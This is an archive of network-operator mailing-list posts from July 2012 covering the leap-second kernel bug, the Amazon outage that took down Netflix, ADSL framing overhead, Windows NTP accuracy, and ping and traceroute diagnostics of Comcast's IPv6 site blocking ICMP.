From r.engehausen at gmail.com Sun Jul 1 00:03:16 2012
From: r.engehausen at gmail.com (Roy)
Date: Sat, 30 Jun 2012 22:03:16 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FEFD4F5.5090306@derekivey.com>
References: <4FEFB944.2010006@paulgraydon.co.uk>
	<596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com>
	<596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com>
	<4FEFD4F5.5090306@derekivey.com>
Message-ID: <4FEFDA14.7070403@gmail.com>

Talk about people not testing things, leap seconds have been around
since 1961. There have been nine leap seconds in the last twenty
years. Any system that can't handle a leap second is seriously flawed.

From rsk at gsp.org Sun Jul 1 05:40:50 2012
From: rsk at gsp.org (Rich Kulawiec)
Date: Sun, 1 Jul 2012 06:40:50 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To:
References:
Message-ID: <20120701104050.GA20597@gsp.org>

A useful explanation may be found here:

http://blogs.discovermagazine.com/badastronomy/2012/06/30/wait-just-a-second-no-really-wait-just-a-second/

---rsk

From jim at reptiles.org Sun Jul 1 09:05:54 2012
From: jim at reptiles.org (Jim Mercer)
Date: Sun, 1 Jul 2012 10:05:54 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FEFB944.2010006@paulgraydon.co.uk>
References: <4FEFB944.2010006@paulgraydon.co.uk>
Message-ID: <20120701140554.GA49593@reptiles.org>

On Sat, Jun 30, 2012 at 04:43:16PM -1000, Paul Graydon wrote:
> On 6/30/2012 3:16 PM, Paul WALL wrote:
> > Comments?
>
> Not very well if you have a modern box (RHES/CentOS 6) and Java apps
> running on them. RHES/CentOS 5 merrily ignored it. Worse, just
> bouncing the Java stack didn't fix it, it required the box to be
> rebooted.

I didn't reboot:

/etc/init.d/ntp stop
date `date +"%m%d%H%M%C%y.%S"`
/etc/init.d/ntp start

seems to calm things right back to normal.

--jim

--
Jim Mercer     Reptilian Research      jim at reptiles.org    +1 416 410-5633
"He who dies with the most toys is nonetheless dead"

From gbonser at seven.com Sun Jul 1 11:44:43 2012
From: gbonser at seven.com (George Bonser)
Date: Sun, 1 Jul 2012 16:44:43 +0000
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FEFDA14.7070403@gmail.com>
References: <4FEFB944.2010006@paulgraydon.co.uk>
	<596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com>
	<596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com>
	<4FEFD4F5.5090306@derekivey.com>
	<4FEFDA14.7070403@gmail.com>
Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com>

> -----Original Message-----
> From: Roy
> Sent: Saturday, June 30, 2012 10:03 PM
> To: nanog at nanog.org
> Subject: Re: F-ckin Leap Seconds, how do they work?
>
>
> Talk about people not testing things, leap seconds have been around
> since 1961. There have been nine leap seconds in the last twenty
> years. Any system that can't handle a leap second is seriously flawed.
>

Roy, this was a problem in only certain kernel versions. Unfortunately
the range of versions affected is pretty widely deployed right now.
Earlier and later versions did not have the problem.

From jra at baylink.com Sun Jul 1 11:52:09 2012
From: jra at baylink.com (Jay Ashworth)
Date: Sun, 1 Jul 2012 12:52:09 -0400 (EDT)
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <201207010213.q612DAbR009810@mail.r-bonomi.com>
Message-ID: <23258236.11872.1341161529019.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "Robert Bonomi"

> > Subject: F-ckin Leap Seconds, how do they work?
> >
> > Comments?
>
> Addressing the Subject question, _as_asked_ -- "Very well".
>

*SNORT* Yes.
But I'm sure the reference was to the Insane Clown Posse spawned meme,
which rapidly became popular with liberals, dissing the apparent
distaste of conservatives for the scientific method:

http://knowyourmeme.com/memes/fcking-magnets-how-do-they-work

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA               http://photo.imageinc.us             +1 727 647 1274

From jra at baylink.com Sun Jul 1 13:36:57 2012
From: jra at baylink.com (Jay Ashworth)
Date: Sun, 1 Jul 2012 14:36:57 -0400 (EDT)
Subject: It's the end of the world, as we know it (Was: FYI Netflix is down)
In-Reply-To:
Message-ID: <24841582.11882.1341167817217.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "jamie rishaw"

> you know what's happening even more?
>
> ..Amazon not learning their lesson.
> Please stop these crappy practices, people. Do real world DR testing.
> Play "What If This City Dropped Off The Map" games, because tonight,
> parts of VA in fact did.

You know what I want everyone to do? Go read this. Right now; it's
Sunday, and I'll wait:

http://interdictor.livejournal.com/2005/08/27/

Start there, and click Next Date a lot, until you get to the end.

Entire metropolitan areas can, and do, fall completely off the map.
If your audience is larger than that area, then you need to prepare
for it. And being reminded of how big it can get is occasionally
necessary.

The 4ESS in the third subbasement of 1WTC that was a toll switch for
most of the northeast reportedly stayed on the air, talking to its SS7
neighbors, until something like 1500EDT, 11 Sep 2001.

It can get *really* big. Are you ready?

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA               http://photo.imageinc.us             +1 727 647 1274

From jra at baylink.com Sun Jul 1 13:38:57 2012
From: jra at baylink.com (Jay Ashworth)
Date: Sun, 1 Jul 2012 14:38:57 -0400 (EDT)
Subject: FYI Netflix is down
In-Reply-To:
Message-ID: <14393687.11884.1341167937515.JavaMail.root@benjamin.baylink.com>

----- Original Message -----
> From: "Tyler Haske"

> How to run a datacenter 101. Have more than one location, preferably
> far apart. It being Amazon I would expect more. :/

Not entirely. Datacenters do go down, our best efforts to the contrary
notwithstanding. Amazon doesn't guarantee you redundancy on EC2, only
the tools to provide it yourself. 25% Amazon; 75% service provider clients;
that's my appraisal of the blame.

Cheers,
-- jra
--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA               http://photo.imageinc.us             +1 727 647 1274

From jwbensley at gmail.com Sun Jul 1 14:01:26 2012
From: jwbensley at gmail.com (James Bensley)
Date: Sun, 1 Jul 2012 20:01:26 +0100
Subject: How do the lowest layers of the DSL stack work?
Message-ID:

Hi list,

I am hoping someone here can explain to me (or point to an article
that does) what is happening at the lower layers of an ADSL connection.

This is an excerpt from the wiki page on ADSL (ANSI T1.413 Issue 2);

"Up to 254 sub-carriers are used downstream; each of these 254
sub-carriers can support the modulation of 0 to 15 bits per baud. The
baud rate is 4,000 symbols per second on each subcarrier. Thus the
maximum theoretical downstream data rate of an ADSL system is 15.24
Mbit/s (254×15×4000).
However, because the data is split up into packets (actually
Reed-Solomon encoded codewords) of 255 bytes, the maximum achievable
downstream data rate is 8.128 Mbit/s (including other overheads)."

That is quite a drop in speed and I'm trying to understand where this
is happening. Assuming a typical PPPoA set up, the ATM frames are 48
bytes of data payload and 5 header bytes, to make a total frame size
of 53 bytes. Somewhere between the physical transfer rate at the
bottom of the stack and this ATM layer, we are consuming all that
bandwidth with other non-user data. Where is it going? According to
that extract, it all disappeared because of RS encoding, which is
hugely vague.

Are ATM frames those used as the 68 data frames in a superframe? I
understand that Reed-Solomon is splitting data into 255 byte codewords
because an 8-bit symbol size has been imposed to give a 32 byte parity
block; is the superframe where RS encoding is applied? If so, I don't
understand how that consumes as much overhead as this statement
claims.

Could someone enlighten me as to what I'm missing between the ATM
layer and the wire rate?

Kind regards,
James.

From paul4004 at gmail.com Sun Jul 1 14:03:13 2012
From: paul4004 at gmail.com (PC)
Date: Sun, 1 Jul 2012 13:03:13 -0600
Subject: [c-nsp] NTP Servers
In-Reply-To:
References: <8C6A44F7-FBC7-4F42-9830-22572A96FF3C@puck.nether.net>
	<7447aaf43870fd4fb89ebc21c0752320@mail.dessus.com>
Message-ID:

Many folks have more than just windows desktop PCs syncing their time.

If your application requires sub-5 second accuracy, (such as end of a
banking day), then Windows NTP is unsuitable for the purpose.

If your only objective is to sync the times on a bunch of user laptops
so they can get Kerberos tickets within the 5 minute tolerance, it
works fine.

For me, even a few seconds apart can be frustrating for comparing log
files between busy devices.

Your reason would be whether or not you fall inside or outside the
Microsoft guidelines below:

From Microsoft: http://support.microsoft.com/kb/939322

We do not guarantee and we do not support the accuracy of the W32Time
service between nodes on a network. The W32Time service is not a
full-featured NTP solution that meets time-sensitive application
needs. The W32Time service is primarily designed to do the following:

- Make the Kerberos version 5 authentication protocol work.
- Provide loose sync time for client computers.

The W32Time service cannot reliably maintain sync time to the range of
1 to 2 seconds. Such tolerances are outside the design specification
of the W32Time service.

On Sat, Jun 30, 2012 at 5:23 PM, Jimmy Hess wrote:

> On 6/30/12, Grant Ridder wrote:
> > I don't understand why anyone would use windows server for anything that
> > needed precision like time.
>
> Probably because they realize that in a Windows domain, their domain
> controllers already provide a SNTP service with the Windows NT PDC
> Emulator providing authoritative time for windows time service, and
> all those windows servers can be enabled as a NTP server with a small
> configuration change, and Windows Domain clients are required to
> be synchronized with this using the Windows time service, as a
> condition for Kerberos authentication and domain logon, for the
> configuration to be a supported one.
>
> So, given you already have those capabilities and those constraints...
> how do you justify deploying another server for providing a separate
> time service, running a new OS, instead of just using the same one
> for all hosts?
>
> In many cases it's not "Why use a windows time server" that has to
> be justified;
> the burden of proof is to answer the question "What can you say that
> indicates you should definitely not use a windows time server for the
> application?" :)
>
> --
> -JH
>
>

From derek at derekivey.com Sun Jul 1 18:28:02 2012
From: derek at derekivey.com (Derek Ivey)
Date: Sun, 01 Jul 2012 19:28:02 -0400
Subject: Comcast's IPv6 Information Site Unreachable
Message-ID: <4FF0DD02.1050007@derekivey.com>

Anyone else having trouble getting to Comcast's IPv6 Information site?
It appears to be unreachable over IPv6.

[root at server ~]# ping6 comcast6.net
PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited
^C
--- comcast6.net ping statistics ---
5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms

[root at server ~]# traceroute6 comcast6.net
traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 byte packets
 1  pfsense.d3r3k.net (2001:470:8:d15::1)  0.278 ms  0.282 ms  0.317 ms
 2  2001:470:7:d15::1 (2001:470:7:d15::1)  20.794 ms  24.746 ms  28.569 ms
 3  gige-g4-12.core1.ash1.he.net (2001:470:0:90::1)  28.946 ms  29.124 ms  29.144 ms
 4  as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2)  28.917 ms  28.936 ms  28.097 ms
 5  if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1)  28.059 ms  31.771 ms  57.135 ms
 6  2001:5a0:600:500::72 (2001:5a0:600:500::72)  28.959 ms 2001:559::31d (2001:559::31d)  29.041 ms  29.060 ms
 7  pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1)  32.553 ms  19.810 ms  16.526 ms
 8  2001:558:0:f669::2 (2001:558:0:f669::2)  39.019 ms  37.954 ms  36.368 ms
 9  2001:558:0:f57f::1 (2001:558:0:f57f::1)  67.134 ms  67.151 ms  67.166 ms
10  pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1)  81.571 ms  81.507 ms  81.569 ms
11  2001:558:0:f744::2 (2001:558:0:f744::2)  80.633 ms  80.760 ms  79.825 ms
12  2001:558:d0:33::1 (2001:558:d0:33::1)  104.686 ms  105.060 ms  105.040 ms
13  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.335 ms  103.962 ms  104.068 ms
14  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.492 ms !X  104.597 ms !X  104.999 ms !X

Thanks,
Derek

From sadiq at asininetech.com Sun Jul 1 18:37:54 2012
From: sadiq at asininetech.com (Sadiq Saif)
Date: Sun, 1 Jul 2012 19:37:54 -0400
Subject: Comcast's IPv6 Information Site Unreachable
In-Reply-To: <4FF0DD02.1050007@derekivey.com>
References: <4FF0DD02.1050007@derekivey.com>
Message-ID:

Website is reachable here via my HE tunnel. Pings are not going
through though as you showed.

On Sun, Jul 1, 2012 at 7:28 PM, Derek Ivey wrote:
> Anyone else having trouble getting to Comcast's IPv6 Information site? It
> appears to be unreachable over IPv6.
>
> [root at server ~]# ping6 comcast6.net
> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited
> ^C
> --- comcast6.net ping statistics ---
> 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms
>
> [root at server ~]# traceroute6 comcast6.net
> traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 byte packets
>  1  pfsense.d3r3k.net (2001:470:8:d15::1)  0.278 ms  0.282 ms  0.317 ms
>  2  2001:470:7:d15::1 (2001:470:7:d15::1)  20.794 ms  24.746 ms  28.569 ms
>  3  gige-g4-12.core1.ash1.he.net (2001:470:0:90::1)  28.946 ms  29.124 ms  29.144 ms
>  4  as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2)  28.917 ms  28.936 ms  28.097 ms
>  5  if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1)  28.059 ms  31.771 ms  57.135 ms
>  6  2001:5a0:600:500::72 (2001:5a0:600:500::72)  28.959 ms 2001:559::31d (2001:559::31d)  29.041 ms  29.060 ms
>  7  pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1)  32.553 ms  19.810 ms  16.526 ms
>  8  2001:558:0:f669::2 (2001:558:0:f669::2)  39.019 ms  37.954 ms  36.368 ms
>  9  2001:558:0:f57f::1 (2001:558:0:f57f::1)  67.134 ms  67.151 ms  67.166 ms
> 10  pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1)  81.571 ms  81.507 ms  81.569 ms
> 11  2001:558:0:f744::2 (2001:558:0:f744::2)  80.633 ms  80.760 ms  79.825 ms
> 12  2001:558:d0:33::1 (2001:558:d0:33::1)  104.686 ms  105.060 ms  105.040 ms
> 13  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.335 ms  103.962 ms  104.068 ms
> 14  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.492 ms !X  104.597 ms !X  104.999 ms !X
>
> Thanks,
> Derek
>

--
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org

From frnkblk at iname.com Sun Jul 1 20:35:24 2012
From: frnkblk at iname.com (Frank Bulk)
Date: Sun, 1 Jul 2012 20:35:24 -0500
Subject: Comcast's IPv6 Information Site Unreachable
In-Reply-To: <4FF0DD02.1050007@derekivey.com>
References: <4FF0DD02.1050007@derekivey.com>
Message-ID: <000201cd57f2$f3973e90$dac5bbb0$@iname.com>

ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012.
But their site loads fine over port 80.

Frank

-----Original Message-----
From: Derek Ivey [mailto:derek at derekivey.com]
Sent: Sunday, July 01, 2012 6:28 PM
To: nanog at nanog.org
Subject: Comcast's IPv6 Information Site Unreachable

Anyone else having trouble getting to Comcast's IPv6 Information site?
It appears to be unreachable over IPv6.
[root at server ~]# ping6 comcast6.net
PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited
^C
--- comcast6.net ping statistics ---
5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms

[root at server ~]# traceroute6 comcast6.net
traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 byte packets
 1  pfsense.d3r3k.net (2001:470:8:d15::1)  0.278 ms  0.282 ms  0.317 ms
 2  2001:470:7:d15::1 (2001:470:7:d15::1)  20.794 ms  24.746 ms  28.569 ms
 3  gige-g4-12.core1.ash1.he.net (2001:470:0:90::1)  28.946 ms  29.124 ms  29.144 ms
 4  as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2)  28.917 ms  28.936 ms  28.097 ms
 5  if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1)  28.059 ms  31.771 ms  57.135 ms
 6  2001:5a0:600:500::72 (2001:5a0:600:500::72)  28.959 ms 2001:559::31d (2001:559::31d)  29.041 ms  29.060 ms
 7  pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1)  32.553 ms  19.810 ms  16.526 ms
 8  2001:558:0:f669::2 (2001:558:0:f669::2)  39.019 ms  37.954 ms  36.368 ms
 9  2001:558:0:f57f::1 (2001:558:0:f57f::1)  67.134 ms  67.151 ms  67.166 ms
10  pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1)  81.571 ms  81.507 ms  81.569 ms
11  2001:558:0:f744::2 (2001:558:0:f744::2)  80.633 ms  80.760 ms  79.825 ms
12  2001:558:d0:33::1 (2001:558:d0:33::1)  104.686 ms  105.060 ms  105.040 ms
13  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.335 ms  103.962 ms  104.068 ms
14  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.492 ms !X  104.597 ms !X  104.999 ms !X

Thanks,
Derek

From derek at derekivey.com Sun Jul 1 20:44:40 2012
From: derek at derekivey.com (Derek Ivey)
Date: Sun, 01 Jul 2012 21:44:40 -0400
Subject: Comcast's IPv6 Information Site Unreachable
In-Reply-To: <000201cd57f2$f3973e90$dac5bbb0$@iname.com>
References: <4FF0DD02.1050007@derekivey.com>
	<000201cd57f2$f3973e90$dac5bbb0$@iname.com>
Message-ID: <4FF0FD08.8050706@derekivey.com>

Thanks for the input guys! Sounds like it might be an issue with my
tunnel then. I had problems getting to a few sites last week
(http://www.dslreports.com/forum/r27265527-IPV6-Issues-Facebook-and-Engadget)
and HE resolved the issue pretty quickly. I will ask them if they are
aware of it.

Thanks,
Derek

On 7/1/2012 9:35 PM, Frank Bulk wrote:
> ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012.
> But their site loads fine over port 80.
>
> Frank
>
> -----Original Message-----
> From: Derek Ivey [mailto:derek at derekivey.com]
> Sent: Sunday, July 01, 2012 6:28 PM
> To: nanog at nanog.org
> Subject: Comcast's IPv6 Information Site Unreachable
>
> Anyone else having trouble getting to Comcast's IPv6 Information site?
> It appears to be unreachable over IPv6.
>
> [root at server ~]# ping6 comcast6.net
> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited
> ^C
> --- comcast6.net ping statistics ---
> 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms
>
> [root at server ~]# traceroute6 comcast6.net
> traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 byte packets
>  1  pfsense.d3r3k.net (2001:470:8:d15::1)  0.278 ms  0.282 ms  0.317 ms
>  2  2001:470:7:d15::1 (2001:470:7:d15::1)  20.794 ms  24.746 ms  28.569 ms
>  3  gige-g4-12.core1.ash1.he.net (2001:470:0:90::1)  28.946 ms  29.124 ms  29.144 ms
>  4  as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2)  28.917 ms  28.936 ms  28.097 ms
>  5  if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1)  28.059 ms  31.771 ms  57.135 ms
>  6  2001:5a0:600:500::72 (2001:5a0:600:500::72)  28.959 ms 2001:559::31d (2001:559::31d)  29.041 ms  29.060 ms
>  7  pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1)  32.553 ms  19.810 ms  16.526 ms
>  8  2001:558:0:f669::2 (2001:558:0:f669::2)  39.019 ms  37.954 ms  36.368 ms
>  9  2001:558:0:f57f::1 (2001:558:0:f57f::1)  67.134 ms  67.151 ms  67.166 ms
> 10  pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1)  81.571 ms  81.507 ms  81.569 ms
> 11  2001:558:0:f744::2 (2001:558:0:f744::2)  80.633 ms  80.760 ms  79.825 ms
> 12  2001:558:d0:33::1 (2001:558:d0:33::1)  104.686 ms  105.060 ms  105.040 ms
> 13  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.335 ms  103.962 ms  104.068 ms
> 14  te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1)  104.492 ms !X  104.597 ms !X  104.999 ms !X
>
> Thanks,
> Derek
>
>
>

From mysidia at gmail.com Sun Jul 1 20:59:42 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sun, 1 Jul 2012 20:59:42 -0500
Subject: [c-nsp] NTP Servers
In-Reply-To:
References: <8C6A44F7-FBC7-4F42-9830-22572A96FF3C@puck.nether.net>
	<7447aaf43870fd4fb89ebc21c0752320@mail.dessus.com>
Message-ID:

On 7/1/12, PC wrote:
> If your application requires sub-5 second accuracy, (such as end of a
> banking day), then Windows NTP is unsuitable for the purpose.

Looks like CYA on Microsoft's part.

That I've seen, Windows NTP in physical environments with a hardware
system clock not having issues consistently provides accuracy better
than +/- 0.5 against the time source it's synced with, but in virtual
environments, which have incompatibilities with high sub-second RTC
accuracy in the first place, neither Windows nor Unix NTP services are
able to provide that consistently without much tinkering.

If it's absolutely critical that you have sub-5 second accuracy, even
Unix NTP is not to be considered good enough, you need highly accurate
hardware time source, something more accurate than the usual system
clock you find in a PC or server.

Unix NTP can only do so much to correct for a broken system clock;
although it does do a very good job disciplining PC real-time clocks
that consistently run a bit too fast or too slow, ultimately the
personal computer clocks can at times be unreliable.... If they were
perfect, you wouldn't need time sync in the first place; just set them
once, and correct the annual 0.01 seconds worth of error once a
year....
--
-JH

From mysidia at gmail.com Sun Jul 1 21:20:11 2012
From: mysidia at gmail.com (Jimmy Hess)
Date: Sun, 1 Jul 2012 21:20:11 -0500
Subject: Comcast's IPv6 Information Site Unreachable
In-Reply-To: <4FF0DD02.1050007@derekivey.com>
References: <4FF0DD02.1050007@derekivey.com>
Message-ID:

On 7/1/12, Derek Ivey wrote:
> Anyone else having trouble getting to Comcast's IPv6 Information site?
> It appears to be unreachable over IPv6.

Looks like just ICMP that's broken.

~# telnet comcast6.net 80
Trying 2001:558:fe23:2:69:252:208:135...
Connected to comcast6.net (2001:558:fe23:2:69:252:208:135).
Escape character is '^]'.
HEAD / HTTP/1.1
Host: comcast6.net
User-Agent: Telnet

HTTP/1.1 200 OK
Date: Mon, 02 Jul 2012 02:21:33 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

Connection closed by foreign host.

~# ping6 comcast6.net
PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 Destination unreachable: Administratively prohibited
From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 Destination unreachable: Administratively prohibited

--- comcast6.net ping statistics ---
8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms

From steve at pirk.com Sun Jul 1 21:38:16 2012
From: steve at pirk.com (steve pirk [egrep])
Date: Sun, 1 Jul 2012 19:38:16 -0700
Subject: FYI Netflix is down
In-Reply-To: <14393687.11884.1341167937515.JavaMail.root@benjamin.baylink.com>
References: <14393687.11884.1341167937515.JavaMail.root@benjamin.baylink.com>
Message-ID:

On Sun, Jul 1, 2012 at 11:38 AM, Jay Ashworth wrote:

> Not entirely. Datacenters do go down, our best efforts to the contrary
> notwithstanding. Amazon doesn't guarantee you redundancy on EC2, only
> the tools to provide it yourself. 25% Amazon; 75% service provider
> clients;
> that's my appraisal of the blame.
>

From a Wired article:

> That's what was supposed to happen at Netflix Friday night. But it didn't
> work out that way.
> According to Twitter messages from Netflix Director of
> Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick Branson, it
> looks like an Amazon Elastic Load Balancing service, designed to spread
> Netflix's processing loads across data centers, failed during the outage.
> Without that ELB service working properly, the Netflix and Pinterest
> services hosted by Amazon crashed.

http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/

The GSLB fail-over that was supposed to take place for the affected
services (that had configured their applications to fail-over) failed.

I heard about this the day after Google announced the Compute Engine
addition to the App Engine product lines they have. The demo was
awesome. I imagine Google has GSLB down pat by now, so some companies
might start looking... ;-]

--steve

From derek at derekivey.com Sun Jul 1 21:45:51 2012
From: derek at derekivey.com (Derek Ivey)
Date: Sun, 01 Jul 2012 22:45:51 -0400
Subject: Comcast's IPv6 Information Site Unreachable
In-Reply-To:
References: <4FF0DD02.1050007@derekivey.com>
Message-ID: <4FF10B5F.2090205@derekivey.com>

Someone replied to my DSL Reports thread:
http://www.dslreports.com/forum/r27289866-

Apparently there is an ACL issue with their load balancer that is
blocking ICMP and causing PMTU issues for people who use tunnels.
http://www.dslreports.com/forum/r27226136-

It looks like it's been going on since June 11. It's strange that
Comcast hasn't resolved the issue by now.

Thanks,
Derek

On 7/1/2012 10:20 PM, Jimmy Hess wrote:
> On 7/1/12, Derek Ivey wrote:
>> Anyone else having trouble getting to Comcast's IPv6 Information site?
>> It appears to be unreachable over IPv6.
> Looks like just ICMP that's broken.
>
> ~# telnet comcast6.net 80
> Trying 2001:558:fe23:2:69:252:208:135...
> Connected to comcast6.net (2001:558:fe23:2:69:252:208:135).
> Escape character is '^]'.
> HEAD / HTTP/1.1
> Host: comcast6.net
> User-Agent: Telnet
>
> HTTP/1.1 200 OK
> Date: Mon, 02 Jul 2012 02:21:33 GMT
> Server: Apache/2.2.15 (Red Hat)
> X-Powered-By: PHP/5.3.3
> Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/
> P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
> Cache-Control: no-cache
> Pragma: no-cache
> Connection: close
> Content-Type: text/html; charset=utf-8
>
> Connection closed by foreign host.
>
>
>
> ~# ping6 comcast6.net
> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data bytes
